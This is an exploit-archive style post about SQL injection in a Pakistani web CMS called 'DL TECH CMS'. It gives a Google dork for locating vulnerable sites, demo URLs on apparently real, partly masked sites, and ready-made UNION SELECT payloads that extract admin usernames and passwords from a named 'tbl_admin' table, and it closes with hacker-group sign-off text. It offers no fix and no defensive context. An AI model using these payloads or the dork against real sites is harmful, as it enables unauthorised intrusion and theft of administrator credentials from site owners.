=================================================================================== Exploit Title: DL TECH CMS SQL Injection =================================================================================== # Google Dork: site:.pk intext:"Designed & Developed By: DL TECH" inurl:".php?" =================================================================================== # Exploit Author: Ashiyane Digital Security Team =================================================================================== # Vendor Homepage: http://dltech.pk/ =================================================================================== # Tested On : All versions =================================================================================== # Demo1 : http://lonXve.com.pk/basket.php?sizeid=0&qty=1&Pid=180' # Demo2 : http://arXlan.pk/products.php?MID=1&SID=22' # Demo3 : http://floXk/products.php?MID=2&SID=34' =================================================================================== # Example : http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(usrname)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+ http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(password)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+ =================================================================================== # Injection Help : Important Table Is 'tbl_admin' And Columns Are 'usrname' AND 'password' =================================================================================== # contact me : injectable@rogers.com InJecTable Was Here ... Hamedan Bax ! ===================================================================================